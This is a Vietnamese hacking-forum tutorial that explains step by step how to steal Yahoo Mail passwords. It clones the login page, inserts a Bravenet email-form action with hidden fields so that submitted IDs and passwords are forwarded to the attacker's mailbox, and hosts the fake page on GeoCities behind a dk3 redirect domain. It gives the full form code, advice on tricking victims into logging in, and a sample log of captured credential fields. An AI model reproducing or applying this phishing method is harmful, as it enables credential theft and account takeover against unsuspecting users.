HCE-lay pass mail qua web trung gian

Ăn cắp password mail qua web trung gian :

trang này đã được đọc lần

Cách này khác cách qua file asp------->txt
Xin chào anh em tôi vừa nghĩ ra chiêu mới ăn cắp pass word yahoo cũng =web mail thôi nhưng nó sẽ tự gửi id và pass về hòm thư của mình,qua trang trung gian là
http://www.braveheart.net/

Chiêu này gồm 3 bước
Các bước đầu như ghi yahoo mail files ,upload lên GeoCities và đăng web ở dk3 ôui đã nói ở bài ăn cắp pass=trang web của bạn ở mục cho newbie

Bước 1 :
Vào http://www.mail.yahoo.com/ nhấn ctrl+a để ghi lại toàn bộ trang Web này (hoặc nhấn File --> Save As)
vd : tôi ghi là duc
Sau đó ta sẽ được thư mục duc_files chứa các file gif và file duc.htm

 Bước 2 :
Vào web trung gian là http://www.bravenet.com/
Sau đó đăng ký làm member ở đây
Khi đã đăng ký là member bạn vào login, sau đó bạn gia nhập http://www.brave.net/
Sau khi đã đăng nhập (login) bạn vào mục Email forms sau đó vào mụcc Copy/paste code

Bạn có được số code của bạn và bạn copy nó lại (ghi lại dưới dạng file txt)

Lấy vd của tôi khi tôi copy về là :

<!---------------- BEGIN BRAVENET CODE -------------->

<div align="center"><br /><br />
<form action="http://pub18.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />
<table cellpadding="0" cellspacing="0" border="0"
bgcolor="#999999"><tr><td>
<table border="0" cellpadding="10" cellspacing="1"
bgcolor="#999999"><tr bgcolor="cornsilk"><td>
<font face="Verdana,Arial,Helvetica" size="1"><b>What is your
name?</b></font><br />
<input type="text" name="name" size="20" /><br />
<font face="Verdana,Arial,Helvetica" size="1"><b>Where are you
from?</b></font><br />
<input type="text" name="where" size="20" /><br>
<font face="Verdana,Arial,Helvetica" size="1"><b>E-mail
address?</b></font><br />
<input type="text" name="replyemail" size="20"><br />
<br /><div align="center">
<input type="submit" name="submit" value=" Send ">
<input type="reset" name="reset" value=" Clear ">
</div></td></tr></table></td></tr></table>
<br /><a href="http://www.bravenet.com/">
<img src="http://images.bravenet.com/brpics/formbutt.gif" border="0"
width="100" height="35" /></a>
</form></div>

Trong đó cần lưu ý dòng cực kỳ quan trọng sau :

<form action="http://pub18.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />

Cái dòng này là để gửi password ăn cắp được về hòm thư của bạn

Chú ý cái ở trên là vd vì đó là của tôi, bạn sẽ có 1 dòng như vậy chỉ có điều số code <input type="hidden" name="usernum" value="1544102702" />
value="1544102702" sẽ khác của tôi (thế thì mới send về hòm thư của ban được)

 Bước 3 :
Mở file htm mà bạn lấy về (của tôi là duc.htm)
Sau đ1o chèn đoạn code mà http://www.bravenet.com/ send về hòm thư cho bạn vd của tôi là :

<form action="http://pub18.bravenet.com/emailfwd/senddata.php"
method="post" enctype="multipart/form-data">
<input type="hidden" name="usernum" value="1544102702" />
<input type="hidden" name="cpv" value="1" />

Nhớ là chèn ở dòng đâu của htm nha
Sau đó save htm lại thế là ok
Sau đó bạn chỉ việc upload htm lên yahoo GeoCities, rồi đăng ký Web ở http://www.dk3.com/
Đăng ký domains, sau đó ở phần real url ghi cái file htm mà bạn đã sau và upload lên ở yahooGeoCities cái này chắc ai cũng biết nên tôi nói nhan
Sau đó dụ victim vào hòm thư qua trang web của bạn trên dk3 là ok. ID và Password sẽ được gửi về hòm thư của bạn với người gửi là notify@brave.net.com

Lưu ý :

Bạn nhất thiết phải là member của brave.net, đăng ký rất dễ và phải vào phần về email để được brave gửi đoạn code cho bạn vd code của tôi là :

<input type="hidden" name="usernum" value="1544102702" />

Cái số code của bạn sẽ không phải là số 1544102702 mà là số khác (Thế thì ID và Password mới send về hòm thư của bạn được)
Và bạn cần dụ victim gõ đúng Password vì cái trang này sẽ không vô yahoo mà vô qua http://www.brave.net/ vì thế ta chỉ lừa được victim 1 lần thôi với victim biết máy tính còn với dan chat thì không sao vì họ không hiểu đâu
Sau đây là vd của tôi :

Date/Time of Posting: Jun 18 2002 / 03:45:31
IP Address: 203.162.122.103

userid = sirduc
_tries =
_src = ym
_last =
promo =
_intl = us
_bypass =
_partner =
_u = 31vvqn0ugtvgs
_v = 0
_challenge = 1hQHKlW4Yo3PJEFkK_URdlDhfqX8
_emailCode =
hasMsgr = 0
_chkP = Y
_done =
login = aaaaaaaaa
passwd = sdfsfdsfg
_save = Sign In